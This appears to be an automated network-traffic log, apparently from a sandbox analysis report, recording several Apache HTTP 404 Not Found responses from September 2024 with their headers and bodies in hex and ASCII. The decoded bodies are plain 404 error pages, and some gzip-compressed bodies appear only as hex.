                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:06:30 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:06:33 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:06:36 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:07:18 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:07:21 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:07:24 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:07:26 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:18:44 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4761Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c 71 77 db 54 96 ff 7b f9 14 6f 4d c1 0e d8 92 ed 24 8e 9b 38 61 5c c7 49 0c 49 1c 1c a7 a5 4b bb 3e b2 f4 6c 8b c8 92 90 9e e3 a4 a5 e7 c0 ee 0c 30 bb 2d 85 81 65 da 5d 58 b6 70 0e e5 c0 4e 3b 3b 33 0b 0c 50 f6 cb d4 69 fa d7 7e 85 bd 4f b2 6c 59 7a 72 8c 0b 0e ac 72 92 58 4f f7 dd f7 bb f7 dd 7b df bd cf 92 32 7f bb 5c cc 95 cf 6f e5 51 83 34 95 a5 c7 32 ce 3f 2c 48 4b 8f 21 38 32 4d 4c 04 24 36 04 c3 c4 64 31 b4 53 5e 89 a5 43 dd 4b 44 26 0a 5e 7a f0 e7 6f 1f 7c fb 51 e7 fa 3b 0f de fb e8 e1 7b 37 8f ee de cd f0 f6 15 17 03 55 68 e2 c5 90 a1 55 35 62 86 90 a8 a9 04 ab c0 4e d5 64 55 c2 fb 51 55 ab 69 8a a2 b5 43 88 ef f6 32 c9 81 c3 81 1e fc 53 e8 8c 60 62 f4 14 df 6b aa 6a d2 01 ba dc 3b a5 87 a8 29 9a 31 8f 1e 9f 9e 9e 5e 18 b8 50 83 01 e7 51 22 a5 ef a3 b3 d8 90 04 55 88 a2 d0 1a 56 f6 30 91 45 01 6d e2 16 0e 45 51 c3 69 88 a2 ac 21 0b 4a 14 85 37 64 d1 d0 4c ad 46 d0 79 61 0d cb e1 28 32 05 d5 8c 99 d8 90 6b 83 43 34 05 a3 2e ab f3 28 3e d8 ac 0b 92 24 ab 75 68 47 c9 38 0c 4f ff f4 29 ae f4 3e 35 12 97 99 ec 12 b4 53 dc cb 95 ca 13 33 e5 4b 78 1e 25 d3 6e 86 bd 8b 6d 2c d7 1b 20 f3 6c dc d3 55 91 55 1c 6b 74 af 4e 27 03 d0 24 d9 8a 9d 49 a6 d3 22 1e 32 dc 8c 77 b8 9e fc 54 f7 71 b6 ca 52 c7 88 98 f0 89 58 d5 0c 09 1b 31 b0 26 a2 35 81 00 18 98 9a 22 4b e8 71 8c 31 53 a0 e9 00 f5 26 99 da eb 8e 9b 1a aa da aa a6 48 ac b1 84 6a d5 f0 a8 af 65 98 54 7f 60 60 fa 20 43 82 f7 49 4c c2 a2 66 08 44 d6 00 50 0b fc c1 a0 73 34 94 2e 66 b9 c7 3c 92 40 01 98 0d 82 3d 81 e9 14 fd 59 60 a2 d3 c1 19 09 36 98 dc e6 1b da 1e f6 48 35 0a f6 3e 0b ce 32 3c 6c 18 9a 87 4d 55 10 77 eb 86 06 9d 01 5f 2d 2d 56 c5 aa bb 7f 9f 01 16 1b 1a 22 42 55 c1 1e b7 6f cb 12 69 50 57 89 3f 31 a4 a7 6e 78 fb f5 6c d3 3f d1 54 da 1a 04 a4 79 24 b4 88 16 68 21 e9 d9 27 86 78 57 82 9b 99 5d 08 90 35 e6 cc 48 6d 8e fe b0 cc db 17 4b ba 56 6f 08 92 dc 32 c1 79 99 d6 59 13 9a b2 72 30 8f 72 9a 0a 2e 21 98 10 e8 d6 e5 2a b6 e7 08 6d 68 aa 06 91 6e 03 ab 8a 16 05 9a 96 21 63 23 8a 9a d0 6c ea 82 88 8f d1 df d2 30 2d 06 78 77 dc 6b 0d ee a0 9e df 17 b1 6e 21 2b a8 35 cd 1d de 39 dc bb c4 72 dd 18 d1 f4 f9 c0 68 ea ea cc 35 b1 69 0a 75 1c 34 f5 be 00 e0 28 df 15 54 24 49 62 ce 84 13 7f e2 48 d5 bc 1e 3b 68 09 ec 20 6d 19 91 df f8 ba dc 41 c2 98 82 6b a4 37 e1 33 43 08 0d 3a 50 30 25 db 34 fc 96 e1 58 84 b3 4a 86 3a df df 39 ba 77 f7 e1 bf fd e6 e1 b7 ef 84 02 ac a3 af 6b 51 93 3c 8a 06 27 12 40 01 54 0e 46 44 13 14 b9 0e 26 22 e2 c1 c0 43 8f 9e 7f d4 98 0b ad 2d 30 6b fe 86 78 b5 c7 81 fc fa 74 87 a2 d3 a7 4f 1f 67 5a 26 68 4b c4 31 bf d4 ee 55 6f 34 eb 1a 12 12 4f d3 1f 76 78 8a ed 3b 01 6a 74 a4 d4 85 d9 8b a1 cf 53 8f e1 82 34 e5 58 46 f4 18 96 3d 48 b2 a9 2b 02 18 a5 ac 5a 1e 53 55 34 71 d7 33 e1 30 db cc 10 6f eb
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:18:46 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4786Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 54 96 ff 79 fb 57 bc 35 05 3b c5 96 6c 27 71 9c c4 09 6b 1c 27 31 24 76 ea 38 2d 1d da f5 91 a5 67 5b 58 96 54 e9 39 89 5b 7a 0e ec ce 00 b3 db 52 3a b0 4c bb 0b cb 14 ce a1 3d b0 d3 ce ce 17 60 80 b2 ff 4c 9d a6 3f ed bf b0 f7 49 fe 22 4b cf 8e eb 82 c3 ac 72 92 58 4f f7 dd f7 b9 f7 dd 7b df bd cf 92 12 7f bf 92 4b 15 ce 6d a5 51 95 d4 95 e5 13 89 ce 3f 2c 48 cb 27 10 1c 89 3a 26 02 12 ab 82 61 62 b2 e4 db 29 ac 86 e2 be f6 25 22 13 05 2f 3f fa d3 77 8f be fb a4 75 fd c6 a3 0f 3e 79 fc c1 ad c3 fb f7 13 bc 7d c5 c1 40 15 ea 78 c9 67 68 25 8d 98 3e 24 6a 2a c1 2a b0 53 35 59 95 f0 7e 50 d5 ca 9a a2 68 7b 3e c4 b7 7b 99 a4 d9 e1 40 0f fe 14 7a 51 30 31 3a c5 77 9b 4a 9a d4 44 97 bb a7 f4 10 35 45 33 16 d0 33 d3 d3 d3 8b 7d 17 ca 30 e0 02 8a c4 f4 7d 74 06 1b 92 a0 0a 41 e4 5b c7 ca 2e 26 b2 28 a0 2c 6e 60 5f 10 55 3b 0d 41 94 34 64 41 09 22 ff a6 2c 1a 9a a9 95 09 3a 27 ac 63 d9 1f 44 a6 a0 9a 21 13 1b 72 b9 7f 88 ba 60 54 64 75 01 85 fb 9b 75 41 92 64 b5 02 ed 28 1a 86 e1 e9 9f 1e c5 95 ee a7 6a e4 32 93 5d 84 76 0a bb b9 52 79 42 a6 7c 09 2f a0 68 dc c9 b0 7b 71 0f cb 95 2a c8 3c 1b 76 75 55 64 15 87 aa ed ab d3 d1 01 68 a2 6c c5 ce 44 e3 71 11 0f 19 6e c6 3d 5c 57 7e aa fb 30 5b 65 b1 23 44 8c 78 44 2c 69 86 84 8d 10 58 13 d1 ea 40 00 0c 4c 4d 91 25 f4 0c c6 98 29 d0 f4 00 f5 46 99 da 6b 8f 1b 1b aa da 92 a6 48 ac b1 84 52 c9 70 a9 af 61 98 54 7f 60 60 7a 3f 43 82 f7 49 48 c2 a2 66 08 44 d6 00 50 03 fc c1 a0 73 34 94 2e 64 b9 c7 02 92 40 01 98 0d 82 3d 81 f1 18 fd 59 64 a2 d3 c1 19 09 36 98 dc 16 aa da 2e 76 49 35 0a f6 1e 0b ce 32 3c 6c 18 9a 8b 4d 49 10 6b 15 43 83 ce 80 af 1c 17 4b 62 c9 d9 bf c7 00 8b 55 0d 11 a1 a4 60 97 db ef c9 12 a9 52 57 09 3f 3b a4 a7 6e b8 fb 75 6d d3 3b d1 54 da 32 04 a4 05 24 34 88 36 d0 42 e2 b3 cf 0e f1 ae 08 37 33 bb 38 40 d6 50 67 46 ca 73 f4 87 65 de 9e 58 d2 b6 7a 43 90 e4 86 09 ce cb b4 ce b2 50 97 95 e6 02 4a 69 2a b8 84 60 42 a0 db 90 4b d8 9e 23 b4 a9 a9 1a 44 ba 4d ac 2a 5a 10 68 1a 86 8c 8d 20 aa 43 b3 a9 0b 22 3e 42 7f cb c3 b4 38 c0 bb c3 6e 6b 70 06 f5 f4 be 88 75 0b 59 46 2d 6b ce f0 ce e1 ee 25 96 eb 86 88 a6 2f 0c 8c a6 8e ce 5c 1d 9b a6 50 c1 83 a6 de 13 00 3a ca 77 04 15 49 92 98 33 d1 89 3f 61 a4 6a 6e 8f ed b7 04 76 90 b6 8c c8 6b 7c 6d ee 20 61 48 c1 65 d2 9d f0 99 21 84 06 1d 68 30 25 db 34 bc 96 d1 b1 88 ce 2a e9 6b fd 70 ef f0 c1 fd c7 ff f1 ab c7 df dd f0 0d b0 8e 9e ae 45 4d 72 29 1a 9c 48 00 05 50 39 18 11 4d 50 e4 0a 98 88 88 fb 03 0f 3d ba fe 51 66 2e b4 b6 c0 ac f9 1b e2 d5 2e 07 f2 ea d3 19 8a e6 e7 e7 8f 32 2d 13 b4 25 e2 90 57 6a e7 aa 37 9a 75 0d 09 89 f3 f4 87 1d 9e 42 fb 9d 00 35 3a 52 ea c2 ec c5 d0 e3 a9 47 70 41 9a 72 24 23 7a 0c cb 1e 24 d9 d4 15 01 8c 52 56 2d 8f 29 29 9a 58 73 4d 38 cc 36 33 c4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:18:49 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 12974Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd bd 7b 97 dc da 75 27 f6 77 f4 29 10 5a 36 79 6d b2 01 14 de f7 f2 5e 07 af 02 50 85 57 01 a8 a7 a5 70 a1 00 14 80 c2 fb 55 00 4a d6 5a 76 32 63 6b 12 c9 b2 c7 8e 47 4a ec 78 64 af 65 79 d9 19 69 32 93 d8 1e db 72 be 8c 78 75 f5 57 be 42 50 dd 6c b2 d9 5d cd 4b 51 36 af 27 e0 62 77 e1 e0 9c 7d 7e 7b 9f fd 3c 8d 02 9e fe b7 9c c6 5a 6b 9d 07 82 3a 89 3f f9 d2 d3 eb 5f 9e ed 7e f2 25 60 38 9e 26 5e 6d 03 4e 60 97 95 57 7f fc 60 6e 8d 9f 90 0f 5e 5c aa c3 3a f6 3e f9 c9 7f fe fb 9f fc fd 9f 3c ff f6 ef fd e4 0f fe e4 a7 7f f0 dd cf 7e f8 c3 a7 e0 d5 95 1b 04 52 3b f1 3e 7e 50 66 db ac ae 1e 00 4e 96 d6 5e 3a 90 4b b3 30 75 bd ee 71 9a ed b2 38 ce da 07 00 f8 62 54 55 f7 d7 14 4e 07 f8 cb 00 63 57 1e f0 cb e0 cb a6 6d e6 f6 c0 d7 5e 9e 9e 0e 27 8b b3 f2 43 e0 17 10 04 f9 e8 b5 0b bb 61 c2 0f 01 18 cf 3b 60 e1 95 ae 9d da 8f 81 07 a2 17 1f bc 3a 74 6c 40 f5 1a ef c1 63 20 b8 6e 78 0c d0 65 68 c7 8f 81 87 4a e8 94 59 95 ed 6a 60 6d 8b 5e f8 f0 31 50 d9 69 f5 a4 f2 ca 70 f7 fa 14 89 5d fa 61 fa 21 00 bd de 9c db ae 1b a6 fe d0 0e 8c a0 61 fa d3 8f 57 3d be fe f2 53 00 7f ed 2c 39 f8 34 08 ba 4d f5 c4 cf 93 2a 3c 7a 1f 02 23 f2 26 c1 97 17 5b 2f f4 83 81 67 0c ba 35 34 0e 53 ef 49 f0 e2 2a 32 ba 07 cd e8 bc 60 d1 11 49 3a de 1b a6 43 6f 4f f7 92 ff 93 ec a1 f3 22 c3 3f 87 45 f8 0e 8b db ac 74 bd f2 c9 a0 4d 75 96 0c 1d 06 02 55 16 87 2e f0 0b 9e e7 9d 65 08 b9 47 bc a3 b3 d2 7b 31 2f fe 46 d1 6e b3 d8 3d 37 97 bd dd 96 b7 c4 d7 94 d5 49 7e 83 82 e5 af 13 ac bd ae 7e e2 7a 4e 56 da 75 98 0d 80 9a c1 1e ca d3 1a bd b1 df 93 4b f3 f8 10 70 07 01 78 e7 41 9c 5f 40 12 3f fd fb e8 2c ba 7c 30 c6 da 2b cf 52 fb 30 c8 0e de 2d ae de 06 fb 2b 12 17 97 8a e7 95 65 76 8b cc d6 76 22 bf cc 86 c1 03 be 1d e9 6c 9d ed cd f1 af 08 78 4e 90 01 b5 bd 8d bd 5b 66 df 86 6e 1d 9c 4c 05 fa c5 37 8c cc cb db e3 5e ea e6 dd 85 3e 71 bb 1b 1c d2 87 80 dd d4 d9 bd 1a 42 62 bf f8 06 eb 82 2f 50 ec a3 7b 78 7d 72 bd 22 3b e2 f4 ef 9c 7a df f1 25 2f b4 be b4 dd b0 a9 06 e3 3d ab 9d 3b 3b 09 e3 fe 43 80 cd d2 c1 24 ec 6a 70 74 72 b8 f5 ae d6 08 50 b2 34 1b 3c 9d e2 a5 71 f6 78 e8 d3 94 a1 57 3e 06 92 a1 b9 ca 6d c7 fb 1c f9 7d f2 26 29 de 63 dd d0 6d 6d b8 e9 d4 f9 ce f1 f2 4b 64 52 ba cb 6e ba f7 0b ef e5 a5 73 a6 fb a4 ce f2 0f ef f5 a6 37 06 5f 24 5e 55 d9 be 77 df d2 df 71 00 d7 c2 bf e1 54 5c d7 3d bb 12 d7 fe 07 02 d2 ec b6 c5 be ae 09 e7 9d f4 a5 12 dd 55 be 17 d4 07 0e 9f c4 de ae 7e b9 e0 e8 1b 3a 96 a7 89 ee ef 79 5e 35 ee 6a c6 b5 46 5c 47 c9 07 cf ff f1 07 9f fd e8 87 3f fd df fe f5 4f ff fe f7 1e dc a3 1d af 64 ed 64 ee 2d 41 0f 46 64 0f 02 38 f1 71 c6 a3 d9 71 e8 0f 2a e2 78 af 3b 9e d3 f1 d2 3e 76 67 03 ed 15 c3 e7 d6 ef 0d 56 7d cb 80 ee ca f3 a6 2b a2 28 ea f3 54 ab 1a a4 e5 78 4f ee 72 7d 33 ea bd 9d
